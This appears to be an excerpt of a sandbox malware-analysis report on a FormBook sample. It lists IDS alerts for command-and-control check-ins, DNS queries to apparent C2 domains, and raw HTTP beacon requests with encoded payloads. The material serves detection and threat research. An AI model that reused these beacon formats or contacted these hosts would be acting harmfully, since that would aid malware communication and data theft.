Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49853 -> 136.243.64.147:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49864 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49849 -> 172.67.132.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49888 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49851 -> 172.67.132.227:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49826 -> 45.33.2.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49842 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49831 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49892 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49875 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49876 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49855 -> 136.243.64.147:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49898 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49858 -> 202.95.11.110:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49860 -> 202.95.11.110:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49872 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49883 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49886 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49884 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49894 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49869 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49878 -> 194.9.94.85:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49841 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49827 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49828 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49859 -> 202.95.11.110:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49871 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49857 -> 202.95.11.110:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49880 -> 45.33.2.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49889 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49873 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49900 -> 160.25.166.123:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49885 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49848 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49904 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49874 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49861 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49829 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49887 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49852 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49833 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49881 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49870 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49882 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49862 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49902 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49895 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49905 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49896 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49867 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49890 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49865 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49879 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49899 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49903 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49877 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49901 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49893 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49891 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49906 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49897 -> 13.248.169.48:80
                Source: DNS query: www.furrcali.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.106.67.112
                Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP
                Source: Joe Sandbox ViewASN Name: AMAZON-02US
                Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49866 -> 23.51.25.15:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49816 -> 23.51.25.15:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49834 -> 23.51.25.15:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,2_2_0013CE44
                Source: global trafficHTTP traffic detected: GET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc= HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDk HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk HTTP/1.1Host: www.nextlevel.financeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDk HTTP/1.1Host: www.buyspeechst.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDk HTTP/1.1Host: www.lejgnu.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.chiro.live
                Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global trafficDNS traffic detected: DNS query: www.bokus.site
                Source: global trafficDNS traffic detected: DNS query: www.elettrocoltura.info
                Source: global trafficDNS traffic detected: DNS query: www.givvjn.info
                Source: global trafficDNS traffic detected: DNS query: www.bonheur.tech
                Source: global trafficDNS traffic detected: DNS query: www.rpa.asia
                Source: global trafficDNS traffic detected: DNS query: www.ogbos88.cyou
                Source: global trafficDNS traffic detected: DNS query: www.smartbath.shop
                Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                Source: global trafficDNS traffic detected: DNS query: www.mirenzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.nextlevel.finance
                Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
                Source: global trafficDNS traffic detected: DNS query: www.buyspeechst.shop
                Source: global trafficDNS traffic detected: DNS query: www.lejgnu.info
                Source: unknownHTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NE7Oz%2BRLdH3W%2BbqQhjSXugvdGh%2FH38aCfWPFbFr0aCu5gajtSSSYCL1v%2F43SboHEgw2tsWzPFfIpOBpTGqlEtkFtDypRYCnVq8NrckcD4Ai8626gRqLRXzJUm%2BR5mhw%2Bc9H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59af9e876e269-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124098&min_rtt=124098&rtt_var=62049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKZcO2J89AEJJw0Ufm75pQOh%2BrjIY4c86hyZGAVXvORG0uVRyqqwLdHkh0G6M5%2FsvuABLqkTeUdcUt7JZmDbw3kV%2Fg0c9bOJX%2FzP5GsoSMhJTSpJcJ0slBMPw7Vv2Y8aSpOo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b0a8c0810ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118830&min_rtt=118830&rtt_var=59415&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZpPX3MVTEyrLZ1ZBb3%2Fite7QEnXTmOTiEgq842kYJGH%2BnHGJKJZzOoCQAj%2Ff9K2kZzKxBWDaVROEEKGf3d%2Fih4NQoy667gjFDKH9tB9lxWFLAbQrp9uFQNibggyg7cziV58D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b1b2932233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119567&min_rtt=119567&rtt_var=59783&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
